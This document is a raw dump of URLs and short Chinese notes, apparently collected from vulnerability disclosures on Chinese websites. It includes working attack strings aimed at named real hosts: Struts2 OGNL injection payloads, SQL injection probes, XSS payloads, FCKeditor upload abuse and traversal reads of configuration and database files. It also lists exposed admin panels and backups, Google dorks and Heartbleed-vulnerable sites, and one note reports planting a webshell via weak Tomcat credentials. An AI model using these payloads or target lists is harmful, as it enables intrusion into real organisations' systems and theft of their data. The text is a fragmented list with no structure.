https://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=inurl%3A%22gglInfordetail.jsp%22 http://www12.zzu.edu.cn//office/admin/123.php http://www.51ey.com/memberForeAction!toRegister.action?comeSource= http://www.freebuf.com/articles/web/28273.html http://www.yctravel.gov.cn/zhuanti/zhengxianchuangyou/show-news.asp?id=378%27 http://m0.mail.sina.com.cn的问题,通过修改浏览器的User-Agent进行的测试。 http://lcse.lenovo.com.cn/Training/Train/EnterExam.aspx?tID=774&ModuleId=250&type=1# http://lcse.lenovo.com.cn/%5CTraining%5CTrain%5CTrainingList.aspx?type=1&ModuleId=252&ParentModuleId=40 http://blog.cxt8.com/123654/articles http://blog.cxt8.com/123654/Articles/Show/80000000000004D5.html http://blog.cxt8.com///123654/Comment/CommentAdd?parentid=0&pindex=1&content=%u54C7%uFF01%u597D%u8D5E%u597D%u8D5E%u54E6%uFF01%uFF01%uFF01%3CBR%3E&commenttype=101&is_desc=true&keyid=1&callback=jQuery1620412802761401835_1396429516079&_=1396429531578 http://blog.cxt8.com/123654/Comment/CommentAdd?parentid=0&pindex=1&content=%u54C7%uFF01%u597D%u8D5E%u597D%u8D5E%u54E6%uFF01%uFF01%uFF01%3CBR%3E&commenttype=101&is_desc=true&keyid=1&callback=jQuery1620412802761401835_1396429516079&_=1396429531578 http://blog.cxt8.com/ http://dadifeige.mop.com/guangxi/alterUserDetails.do?userId=43 http://jgxy.hpu.edu.cn/printpage.asp?ArticleID=3975 http://www.jntlj.com/ www.114menhu.com商盟系统存在弱口令,客查看所有商户,用户,订单。。。。。等一系列的信息。望紧急修复。 http://lib.hpu.edu.cn/sjk/new/printpage.asp?ArticleID=585 http://mv.wo.com.cn/中国联通沃音乐福建区-点击旧版门户 http://61.241.199.224/index http://61.241.199.224/searchtone?singerName=%B3%C2%B3%FE%C9%F http://218.206.27.196:8080/cqCityAppFM/news/createNewsAction.action存在struts2漏洞 cq.ip66.com/online.php http://www.iweju.com/index.action http://top.chinaz.com/Action/API.aspx?host=www.aa.com http://ext.chrome.360.cn/webstore/detail/fbiaiekikpfpbfjpgplkhlembgbjmffp http://sdk3.doudouy.com/api/users/1 http://www.jxteacher.com/admin/index.aspx 
http://www.jxteacher.com/Ajax/login.aspx?username=360121026019110153&userpwd=1&resultType=json, http://e.tju.edu.cn/toModule.do?prefix=/News&page=/newsDetail.do?infoid=28480 http://cam.tju.edu.cn/tju/achiev/index.php?id1=10 inurl:sql.php http://www.oei.ytu.edu.cn/phpmyadmin/sql.php?db=tw&table=jos_content&lang=zh_cn&collation_connection=utf8_general_ci&token=06475dfb9dc9ae89e2eae94d57f53bab http://law.inc.hc360.com/finance/Bespeak.aspx?FinId=182678&Factory_Id=&Sale=&Dept_Id=&Area_Id= http://www.3gchina.org/news/show/default.asp?informationid=201309191145125640 http://www.3gchina.org/sitetemplate/wap/index.asp?yp_id=277 http://www.3gchina.org/news/show/?infor_201404030938116950.html这种 http://www.jlsfda.gov.cn/shiyaojiandongtai/news.asp?dm=9094 http://11889.189.cn/portal/ http://11889.189.cn/android/.svn/entries http://11889.189.cn/wap/.svn/entries http://11889.189.cn/download/css/.svn/entries http://11889.189.cn/download/js/.svn/entries http://fc.118100.cn/bbs/ http://fc.118100.cn/bbs/ http://www.china.ccoo.cn/里面的所有网站。随便找到网站的一个用户名,这儿存在用户ID泄露,尽然能够直接看到。 https://www.google.co.in/search?sourceid=chrome&ie=UTF-8&q=inurl%3A%22gglInfordetail.jsp%22 site:7daysinn.cn inurl:xls http://www.lsbchina.com/)存在SQL注射可直接注出管理员 http://jingfan.tcl.com/sf/NewsView.asp?id=46 http://gis.tcl.com/gis.rar http://multimedia.tcl.com/tcl.rar http://61.manzuo.com/index.php?s=/Index/topics&id=189 www.maigoo.com http://blog.cnfol.com/ http://mpa.tju.edu.cn/page.php?p=5 bt:/pentest/database/sqlmap# http://mpa.tju.edu.cn/page.php?p=5 http://sqlmap.org http://www.fschina.com/chi/contactus.php?id=1 http://www.fschina.com/phpmyadmin/ http://www.dhlbsc.gov.cn/a/ http://www.kstar.com.cn/cases/ups_xiangxi.aspx?id=14 http://com.demo.powereasy.net/,注册个帐号~~ http://com.demo.powereasy.net/User/Index.aspx,选择信息管理 http://www.laoganma.com.cn/data/ http://www.laoganma.com.cn/images/ http://www.laoganma.com.cn/upload/ http://www.laoganma.com.cn/upload/%3b3.php%3b.jpg http://www.laoganma.com.cn/vote/style.jsp 
bbs.anguanjia.com/utility/restore.php就可以看到数据备份文件,还支持下载哦。 http://www.shopnctest.com/c2c/2013/demo/ http://www.sipa.sjtu.edu.cn/sdxadmin/login.do http://www.bppa.org.cn/ReadNews.asp?BigClassID=6&SmallClassID=30&SpecialID=0SmallClassName=&BigClassName=&NewsID=8172 http://www.sanfu.com http://www.sanfu.com/test.txt http://www.lnlaw.gov.cn:5200/ https://graph.renren.com/oauth/authorize?client_id=117231&response_type=code&scope=publish_feed,photo_upload&state=a%3d1%26b%3d2&redirect_uri=http%3A%2F%2Fwww.5sing.com%2FOpenLoginRecive%3Ftype%3D3%26refUrl%3Dhttp%3A%2F%2Fwww.5sing.com%2Fmy%2Fset%2Fbindsns%2F3%3Fcommand%3Dbind&x_renew=true http://www.5sing.com/OpenLoginRecive?type=3&refUrl=http://www.5sing.com/my/set/bindsns/3?command=bind&code=lwz0gikwKpUP3cM8G4eYO28qGSgP0PDf&state=a%3D1%26amp%3Bb%3D2 http://220.191.210.97:8080/WebHall/NewsDatail.aspx?newsId=265 http://cam.tju.edu.cn/tju/moreNews.php?viewNum=2&sid=10 https://api.weibo.com/oauth2/authorize?client_id=2043051649&redirect_uri=http://login.tudou.com/xiaonei/connect/activeBack.action&response_type=code&state=2 http://login.tudou.com/xiaonei/connect/activeBack.action?state=2&code=ac331d1522fe37fd7d7ad19e501b8393 http://www.scpta.gov.cn/ http://home.zhcw.com/ http://home.zhcw.com/expert20121210.tar.gz http://www.wuchangzs.com/admin/ http://218.201.202.231:9005/msmp/clientMessageCategoryAction!showList.action http://61.187.87.7/birth/login.action http://www.ecict.com.cn/Newsdetail.php http://www.ecict.com.cn/Newsdetail.php?cid=13&id=158’ http://219.243.39.24/wctju3/ http://219.243.39.24/wctju3/admin_login.aspx http://219.243.39.24/wctju3/Admin.aspx http://121.193.130.63:8080/phone/query.do?method=search&id=101 http://gacfiatauto.hz.letv.com/php/voguserlist.php http://116.228.73.38:8008/sto_ser/部门服务质量管理系统登录 http://116.228.73.38:8008/sto_ser/upload/sf.php http://www.wuchangzs.com/content.php?id=1 http://weipai.baidu.com//photo/likephoto?pid=2 http://10.7.0.19/admin 
http://cs.cnfol.com/gold/expertPost.html?expertId=6397461&pageNumber=1&pageSize=6&showType=1 http://bbs.zone.jd.com/ http://bbs.zone.jd.com/uc_server/ http://zhan.renren.com/123123111/word/create http://pay.uhuibao.com:8083/SunspeedyPayment/toPayment.action http://210.22.8.98/login.action http://app.renren.com/developers/baseinfo/save suc:true,msg:'成功 http://widget.weibo.com/ http://hui.renren.com/onlineshopping/address/deleteUserAddressConfig http://eoffice8.weaver.cn:8028/login.php http://eoffice8.weaver.cn:8028/building/urlurl.php http://guest.lenovo.com.cn/api/user/point_log.php?uid=2336 http://www.jia.com/citylist/index_deco.php www.jia.com http://www.jia.com http://www.rgrcb.com/readme.txt http://www.rgrcb.com/manage/Manage_Index.php http://go.10086.cn/g/k8cmd.jsp http://219.139.44.218:3000/ http://219.139.44.218:3000/temp/ http://219.139.44.218:3000/temp/cmis/admin/index.asp http://219.139.44.218:3000/temp/cmis/admin/System/dbback/back.asp http://wooyun.org/bugs/wooyun-2013-032545 http://www.google.co.in/#newwindow=1&q=inurl:web_news%2FWebFromList.aspx http://laspzx.linan.gov.cn:8080/ewebeditor/admin/default.aspx http://www.hcggzy.com/ewebeditor/admin/default.aspx http://www.google.co.in/#newwindow=1&q=inurl:web_news%2FWebFromList.aspx http://www.hcggzy.com/public/noteanswer.aspx?txtNoteID=1 http://www.xszbjyw.com:82/public/noteanswer.aspx?txtNoteID=1 http://laspzx.linan.gov.cn:8080/public/noteanswer.aspx?txtNoteID=1 http://www.5eplay.com/group/1/topic/389251?p=0#pub-news http://baike.baidu.com/link?url=G6x2WfNdUdEqb8uOGeqI-NbIleKBZKR70LB4DDkINKSA1uzpJPzeWJoM3sToJN14VUpwkHEQmowx_aQ4cmAPZK http://www.chewen.com/ http://baidu.com http://zfzx.clo.com.cn:8080/reporting/first.do http://202.108.36.116/login.aspx http://202.108.36.89/login.aspx http://www.gz12358.gov.cn/install/index.aspx http://zs.linekong.com/picture.php?sort_id=271&page=2#p=a001这是蓝港某在线某分站,存在sql注入。 http://kyc.chsnenu.edu.cn/administrators/admin_index.asp http://wap.hjsm.tom.com/.svn/entries 
http://www.syc.com.cn/sys/Article/case/userlist/ http://oa.syc.com.cn/OA/help/HelpShowTip.aspx?helpid=1 http://zjec.mountor.cn/ http://zjec.mountor.cn/license!getExpireDateOfDays.action http://www.pnbs.gov.cn/web!listItem.action?ivo.showtype=bm&ivo.typeimg=/upload/upfiles/20121217/201212171705450.png&ivo.showtypename=%C6%D5%C4%FE%CA%D0%CD%E2%CA%C2%C7%C8%CE%F1%BE%D6&ivo.affairid=&ivo.orgid=DEPARTMENT00001576 http://www.pnbs.gov.cn/upload/upfiles/20140404/201404041806120.jsp http://www.guilinmeijing.com/showzt.php?nid=1 http://quan.sohu.com http://baidu.com http://so.tv.sohu.com/mts?box=1&wd=%3Cscript%3Ealert%28%22xss%22%29%3C%2Fscript%3E&qq-pf-to=pcqq.c2c http://moffice.wo.com.cn/menu_show.php?MenuID=8 http://in.sdo.com/咦这个不是盛大网站么?然后看了下。。又看了wooyun大胖子的帖子后。。结果还是存在一些错误还没修改的嘛。。然后。。。看了下。。WP程序耶!OK。。。后台地址知道了。后台地址: http://in.sdo.com/wp-admin/ http://dynamic.app.m.letv.com/android/dynamic.php?mod=passport&ctl=index&act=getUserByID&uid=10&pcode=010210000&version=5.0 http://112.122.11.156/ http://www.phpapp.cn/index.html http://www.axxfj.gov.cn/manage/Login.asp http://218.201.40.106/wap/ http://www.hanyastar.com/web_us/page/CN2/index.aspx http://183.62.138.14/xmusz/portal!memberLogin.action http://www.scal.com.cn/Scal.WebMaster/News/Accessory/FileDownL.aspx?lins=/&name=./web.config http://www.scal.com.cn/Scal.WebMaster/News/Accessory/FileDownL.aspx?lins=/&name=./App_Data/Config.xml http://www.scal.com.cn/Scal.WebMaster/News/Accessory/FileDownL.aspx?lins=/&name=./App_Data/DbConn.xml http://www1.bsqgs.com:9002/WebRoot/ http://wan.7k7k.com/uploadfiles/userfiles/image/%E7%A5%9E%E6%9B%B2/%E7%8E%A9%E5%AE%B62.jpg http://wan.7k7k.com//uploadfiles/userfiles/image/php.jpg http://content.kefu.189.cn:8005/public/sjkf/hotwords/searchPrompt?&appCode=003&hotWord=1&token=5db9ae9853aabd4f0a388e21a0e9d1ad&deviceOS=android http://waimai.2000tuan.com/waimai/view/get_waimai_by_shopid_and_typeid.php?shop_id=1&page=-1&city_id=31&type_id=4 http://119.145.235.91:8809 site:bbs.lbesec.com inurl:profile 
http://open.youku.com/docs/api_videos.html#videos-show-basic http://v.youku.com/v_show/id_XNjk0NzIwOTAw.html?f=22126172&ev=2 http://player.youku.com/player.php/sid/XNjk0NzIwOTAw/v.swf http://binzhou.mop.com http://beian.bizcn.com/.svn/entries http://dzbp.wzup.gov.cn/login.aspx http://edu.china-sss.com/ http://127.0.0.1/v5.0/member/message.php?action=send&touser=oboi123&title=RE:RE%3ARE%3Asdaaaaaaa data:text/html;base64,PHNjcmlwdD5hbGVydCgiS0NGIik8L3NjcmlwdD4= http://xgb.scu.edu.cn:8088/newsDetail.aspx?id=350155 http://dyactive2.vip.xunlei.com/crystal/?type=init&callback=jsonp1396702220170 http://api.liebao.cn/mars/index.php?r=calendar/weatherwarning网址, http://api.liebao.cn/mars/index.php api.liebao.cn/mars/protected/views/site/index.php api.liebao.cn/mars/protected/views/layouts/main.php http://api.liebao.cn/mars/index.php?r=site/login http://twt.tju.edu.cn/theory/sub_type.php?tid=5&sub_id=62 http://yjs.hnu.cn/zsxt/tmsgl/login.aspx http://113.240.249.181:8080/prjlib/login.xhtml http://www.gantuan.com/shop/review.php http://www.dcbmj.gov.cn/content.asp?id=378 http://www.beescms.com/ http://www2.chinatelecom.com.cn/jobs/index.php?p_id=2&ac=1&j_id=bjsx-12001&i=118 http://www2.chinatelecom.com.cn/jobs/index.php?p_id=2&ac=67&ju_id=bjsx-12001-62680 http://www2.chinatelecom.com.cn/bx2/getfile.php?id=41703 http://www2.chinatelecom.com.cn/jobs/upload/CR-6XyVjyGoY67aaXXGHCRe.php http://hd.jstv.com/xhsy/admin/login.aspx www.ccb.com/sc/20090831_1251709679/sms.xls http://www.cptv.com.cn/ http://haha.sogou.com/submit http://vod_flv.people.com.cn/findMaterialPlayUrlWithToken.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 vod.people.com.cn/mediaUrl.jspa 
http://vod_flv.people.com.cn/findMaterialPlayUrlWithToken.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 inurl:filemanage.php",即可找到长江网移动智能报刊信息发布云平台的后台管理页面: http://cjmb.cjn.cn/cjnadmin_tmp/web/index.php http://cjmb.cjn.cn/cjnadmin/web/index.php http://post.baidu.com/safecheck/?XXXXXXXXXXXXXXXXXXXXXXXXXXXXX http://wooyun.org http://post.baidu.com/safecheck/?XXXXXXXXXXXXXXXXXXXXXXXXXXXXX http://post.baidu.com/safecheck/?x+Z5mMbGPAu1LJqUU6N6bPwYE5jYY0era3GG37UlS1GBQRtifH7TZhS4jdBDRUK4tRM7J3UHzxJcIcUo5vI27ZYUGRnMkV2TIc30DoYlHCpAMK9WZbvHWHnPwGfiBcHEMDxm7iZ2BjQ= zhushou360://type=apk&name=360影视大全&refer=360se&icon=http://p5.qhimg.com/t0193ee0bd27701a112.png&url=http://softfile.3g.qq.com/msoft/179/1105/91281/qq_4.6.2.2125_android.apk http://www.mdjmu.cn/zsc/admin/adminlogin.asp http://www.dongyingport.gov.cn/articleshow.php?id=6 http://fuwu.myxinnet.com/ http://publish.tju.edu.cn/Logon.do data:password=88952634&user_id=88952634 http://www.17ugo.com/user.php?act=Setnewpassw&username=15652732143 http://www.17ugo.com/app/ http://video.beijing.gov.cn/play.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://vod.sasac.gov.cn/play.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://vedio.bjstats.gov.cn/vodlist.jspa?redirect:$%7B%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29%7D 
http://live.hwjyw.com/courseview.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://search.wenming.cn/godpp/godSearch.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://www.ccmag.cn/cusmMaganized!docMaganized.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://search.cdpf.org.cn/mb/j/search/search.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://www.zjport.gov.cn/ask/questionDetailt.jspa http://vchat.anhuinews.com:8080/chat/findPlay.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%22test.%22%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://www.sinopectv.cn/ http://search.news.cn/inSearch.jspa?redirect:${%23rep%3d%23context.get%28%27com.opensymphony.xwork.dispatcher.HttpServletResponse%27%29,%23rep.getWriter%28%29.println%28%23application%29,%23rep.getWriter%28%29.flush%28%29,%23rep.getWriter%28%29.close%28%29 http://mms.woshitv.com:8080/mmscis/videoPlay/CISGetVodPlayURL.jspa http://vchat.thmz.com:8080/WebRootPortal/findChatInfo.jspa http://sm.huanbohainews.com.cn:8080/mms3.2/videoPlay/findMaterialPlayUrlWithToken.jspa?materialId=4635&materialType=1&unitID=3931 
http://z.ncnews.com.cn:8080/mmscms/liveRecordChannelMgr/getChannelPlayInfo.jspa?channelid=1 http://live.hebei.com.cn:8080/chat/playInfo.jspa?chatid=57 http://music.nbradio.com:8080/chat/listBackupChats.jspa?perPage=10 http://video.fjtv.net:8080/mms3.0/videoPlay/findBroadcastUrl.jspa http://www.txtv.net.cn:8080/ad/streamServer/saveStreamServer!input.jspa http://mms.am765.com/mediaUrl.jspa?indexid=459123&streamid=459121 http://mms.hnr.cn:8080/mms3.2/videoPlay/findMaterialPlayUrlWithToken.jspa?materialId=64807&materialType=1&unitID=29112 http://vblog.habctv.com/administrator/ http://v.scol.com.cn/administrator/index.php?mosmsg=Please+login http://chat.ahbbtv.com:8080/chat/findPlay.jspa http://video.sxrb.com/administrator/index.php http://live.tangshanradio.com/administrator/index.php http://mms.dztv.tv:8080/mms3.3/videoPlay/findBroadcastUrl.jspa?loadType=0&channelType=0&channelID=7 http://zhixing.court.gov.cn/search/search?pname=11%27 https://113.105.248.132 https://113.105.248.132/upload.php http://222.18.15.135:80/jiuye/broadcast_detail.php?id=744 http://211.152.123.83/login.jhtml http://211.152.123.83/login.jhtml?redirect%3A%24{%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28%22%2F%22%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29 http://wenxue.scu.edu.cn/zangxue/magfull.aspx?id=171 http://ah.10155.com http://www.panshi.gov.cn/infopub25/expansion/bossmail/mail.mdb www.panshi.gov.cn/infopub25/20130905/123.asp http://218.242.176.202:8088/ http://218.242.176.202:8088/fckeditor/editor/filemanager/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp http://www.lbesec.com/report/error_report.action 
http://www.4008-197-197.com/order/header/get?headerId=85000000773020 www.jsagri.gov.cn/bsclxz/fll/files/new www.jsagri.gov.cn/bsclxz/fll/files/new/123.asp http://bbs.jcnews.com.cn/ ftp://jcnews.com.cn/%D6%B1%CB%B5.txt, http://www.kjks001.com/admin/login.php http://tdyw.tju.edu.cn/news_detail.php?sub=1&id=2812 site:ttkdex.com http://www.ttkdex.com/ttkdweb/admin_ttkd/welcome.jsp http://dept.ccbupt.com/rsc/ReadNews.asp?NewsID=223&BigClassID=7&SmallClassID=9 http://www.baidu.com/#wd=%E4%BF%A1%E6%81%AF%E6%8A%80%E6%9C%AF%E6%95%99%E5%AD%A6%E8%BE%85%E5%8A%A9%E5%B9%B3%E5%8F%B03.0%20%E9%99%88%E6%96%8C&ie=utf-8&tn=baiduhome_pg&f=8&pn=10&rsv_page=1 http://dd.gzuni.com http://foundation.scu.edu.cn/uploadPic.asp http://zs.hzzk.gov.cn/zsyze/login/Jeecms.do http://software.twt.edu.cn/download.php?id=8465 cn:8080/ http://kuwo.cn:8080/jsp-examples/ http://www.sogou.com/咳咳。。。好像没啥。。插入XSS。。然后我一直点击上面的功能!谁知道。。 http://gouwu.sogou.com/shop?query=%3C%2Ftitle%3E%3Cscript%3Ealert%28%2Fx%2F%29%3C%2Fscript%3E&display=grid&sourceid=sr_tbtn&w=01029901&sut=394&sst0=1396755107893 http://www.nmjt.gov.cn/whcx/index.jsp http://sqlmap.org http://www.cdbmj.gov.cn/bmpcms/ http://twt.tju.edu.cn/theory/type.php?t_id=2 http://twt.tju.edu.cn/theory/read.php?id=743 http://61.161.127.122/flcp/web/m/user/drawing http://www.edugd.cn/web/46/xw/1/46_11872/第二批数据问题_20080311.TXT http://gd.vnet.cn/然后点击这个 http://wooyun.org/bugs/wooyun-2014-053008,厂商已经做了修补。但是只是限制了列目录,没有做敏感信息访问的ip限制。 http://office.homeinns.com/staffinfo/SMDocument/Upload/2010-5-1317430.xls http://office.homeinns.com/staffinfo/OCSDocument/Upload/2013-8-27162223.xlsx http://tdyw.tju.edu.cn/Admin2/ http://sbc.nbut.edu.cn/admin/userlogin.aspx http://tdyw.tju.edu.cn/friends/rosemodel.php?son=articlelist&sub=1 http://tdyw.tju.edu.cn/counter/Graphp.php?Name=shouye http://g.tju.edu.cn:8800/services.php?action=safe_login&user_login_name= http://edit.hongxiu.com/zhuanti/review.asp?id=191%20order%20by%205-- http://202.119.84.62/web_admin/ 
http://gschool.hebmu.edu.cn/web_admin/index.aspx http://yjs.cdutcm.edu.cn/web_admin/index.aspx http://gschool.hebmu.edu.cn/web_admin/index.aspx http://yjs.cdutcm.edu.cn/web_admin/index.aspx http://yjs.cdutcm.edu.cn/web_admin/index.aspx http://121.14.4.151:88/icp/common/checklogin.action http://net.adpush.cn/ http://net.adpush.cn/Manage/EditADSpace/33000 http://www.scxzfw.gov.cn/ http://http://home.inc.hc360.com:8089,由tomcat搭建,访问http://home.inc.hc360.com:8089/manager/html.存在弱口令admin/admin,成功进入,部署一个webshell,然后走人。shell地址:http://home.inc.hc360.com:8089/job/ http://203.195.189.34/admin/ http://203.195.189.34/ http://203.195.189.34/admin/.svn/entries http://211.154.135.186/svn/happy/backend/web/admin http://211.154.135.186/svn/happy http://shenzhenair.com/module/wshdp.rar http://kms.homeinns.com/ https://www.dodopal.com/wap/news-content.php?id=1344 http://1ct.luolai.com:88/custom/supermarket/CreateInterestInfo.aspx http://click.es.baidu.com/adx.php?c=cz1lYWYxODcwOTIyZTFmYjYzAHQ9MTM5MjIxNTE4NABzZT0xAGJ1PTY3NzAzNjMAdHU9OTIyMzM3MjAzMjU2MDc0ODk5NQBhZD0yOTY2MwBzaXRlPWh0dHA6Ly93d3cuY2hhemlkaWFuLmNvbS9jeS8Adj0xAGk9MTJhMWE1ZWU&k=dz0yNTAAaD0yNTAAY3NpZD0xMDczNzQxODI0MjUwAHRtPTU2MTcwAHRkPTk0MDQ4MwBmbj1odW9jaGVjb21fY3ByAGZhbj0AdWlkPTY5NDIwMDUAY2g9AG9zPTEAYnI9MTIAaXA9MTQuMTM0LjE4Ni4xNDk&url=http%3A%2F%2Frtb%2Ebehe%2Ecom%2Fbdck%3Fexchgid%3D11%26extbd%3DMTk0NDg4LDE5MjA5LGFlYWUzOTkwOTEzM2U5ODY4YTMxMGUyZjkwYzFkM2FlLGJkXzgsMTQ4ODUzNDkwLDE0LjEzNC4xODYuMTQ5LDEzNzEwNjEwNDEwMDEwMCxDaHJvbWUsV2luZG93cyBYUCx6aCwsLGJkXzkyMjMzNzIwMzI1NjA3NDg5OTUsMixiOWtnblksaHR0cDovL3d3dy5jaGF6aWRpYW4uY29tL2N5Lyw5ODJhYzg1NjFiMTE3NWNi%26landing%3Dhttp%3A%2F%2Ft.mail.189.cn%2fA0VEZh%3fq%3d140107i0vviC5%26sid%3d148853490?%b2la7dlr http://zhushou.huihui.cn/api/event/jigsaw/getonepiece?jsonp=youdaogouwupi1396890582536&give=0&t=1396890582536 http://www.huihui.cn/minisite/zhushou_pintu?keyfrom=zhushou_pintu2&jigsaw=89effe61d5b6c522e5f3aa8014bb779c http://www.cssc-cul.org.cn/component_news/news_detail.php?id=0 
http://pal.sgepri.sgcc.com.cn/web.rar http://www.foowu365.com/search/index.php?key=1&myord=1 http://su.whut.edu.cn/Myadmin/Login.aspx http://joe.game.tom.com http://www.php.net/cached.php?t=1234&f=index.php URL:http://www.jlcctele.com/NewsServlet?action=one&id=29 http://theme.oppo.com/?q=user/authordetail&author=%E5%B0%8F%E5%B8%83%E7%88%B1%E9%9B%A8%27%20and%201=1%23 http://theme.oppo.com/?q=user/authordetail&author=%E5%B0%8F%E5%B8%83%E7%88%B1%E9%9B%A8%27%20and%201=2%23 http://finance.whu.edu.cn/web3/content.aspx?lb=zc www.tools.net http://drops.wooyun.org/papers/1381 www.mogujie.com http://www.hicdma.com/views/contents/member/login/api/check_account.jsp?_=1396875610591&account=65854848465 http://www.17u.cn/flight/FlightPriceNew.aspx?ajax=GetPageData&OrgPort=CSX&DesPort=&Sort=&CurrPage=2 http://www.now.cn/whois/nowcheck.net http://www.now.cn/chinesedomain/chnowcheck.net http://www.now.cn/indexr.php?r=!M2OT_231&page=/domain/index.net http://chinapost.com.cn/ http://yjcx.chinapost.com.cn/ http://yjcx.chinapost.com.cn/vipcustom.do?action=vipLogin http://yjcx.chinapost.com.cn/vipcustom.do?action=vipLoginVal http://bbs.anquan.org/forum.php?mod=viewthread&tid=40002 http://pan.baidu.com/s/1bnvOef1 http://t1.fanwe.net:94/m22/Goods-showcate-id-48.html http://ip.taobao.com/.svn/entries http://drops.wooyun.org/papers/1381 http://service.tp-link.com.cn/search_download.html?level1=0&level2=0&prodcut=0&kw=1 http://drops.wooyun.org/papers/1381 https://vip.btcchina.com www.snda.com https://account.mozilla.com.cn https://passport.vip.com http://www.126.com/ www.mycolorway.com http://www.59.cn/domain/search.asp https://login.kongfz.com http://www.cnhgs.com/main.php?id=1 URL:http://3g.96963.com/news_ct.php?id=250 http://mail.163.com/ https://passport.suning.com https://account.mozilla.com.cn http://heartbleed.com/ www.letv.com www.oschina.net https://account.sogou.com http://blog.existentialize.com/diagnosis-of-the-openssl-heartbleed-bug.html http://drops.wooyun.org/papers/1381 
http://s3.jspenguin.org/ssltest.py https://login.lvmama.com https://lastpass.com/ https://cmpay.10086.cn/存在运维不当导致可以登录随机用户并且获取服务器敏感信息 http://www.anquanbao.com/ https://uhost.ucloud.cn https://udb.ucloud.cn https://hao.yy.com www.126.com http://drops.wooyun.org/papers/1381 www.91.com http://www.oschina.net/news/50540/cve-2014-0160 http://www.bter.com www.ourgame.com http://www.easecoin.com/ http://redbaby.suning.com/ http://vip.suning.com/ http://binggo.suning.com/ www.leiphone.com https://www.yfcf.com/user-register http://newyunying.xinnet.com/ port:443 http://passport.sogou-inc.com/ www.yy.com存在OpenSSL www.changyou.com www.yodbank.com https://account.wandoujia.com inurl:edu www.kuaiyinpay.com可能获取到包含账号密码的HTTP请求 http://el.homeinns.com/login/index.html https://jinshuju.net www.coinsave.com可获取到部分用户信息及SQL语句 https://cloudcontrol.chinacache.com/ https://support.dnspod.cn http://www.newv.com.cn/fileroot/bos/content/news/case/bgkh/list.html inurl:nwc_755_newvexam inurl:nwc_user_cloud inurl:nwc_user_enterprise http://drops.wooyun.org/papers/1381 https://i ps://isis.nsfc.g ov.cn/egrantweb/ http://www.foowu365.com/base/install/ www.shuobar.cn http://www.gainward.cn/script/news_detail.php?id=281 http://mekluwc.bupt.edu.cn/modules.php http://mekluwc.bupt.edu.cn/modules.php http://mekluwc.bupt.edu.cn/admin.php http://www.4008117117.com/ http://xsda.bupt.edu.cn:81/yd_das_login.aspx https://id.ejoy.com/ http://hqxs.bupt.edu.cn/index.php http://hqxs.bupt.edu.cn/phpsso_server/uploadfile/avatar/1/1/42/22/conf1g.php http://meercin.bupt.edu.cn/dede/ www.kuaiyinpay.com www.kuaiyinpay.c www.kuaiyinpay.com..Connection www.kuaiyinpay.com..Connection www.kuaiyinpay.com..Connection http://hotel.11185.cn/ http://zj.sina.com.cn/crm/bookmgr/login.html http://yjxt.bupt.edu.cn/open/replyOpen.aspx?xsfl=11 http://yjxt.bupt.edu.cn/open/pyfaView.aspx?EID=Jw==&UID= https://sslvpn.tsinghua.edu.cn存在openssl www.jiepang.com www.jiepang.com http://qyh.zshr.cn/person/searchjobs.php?id=1 
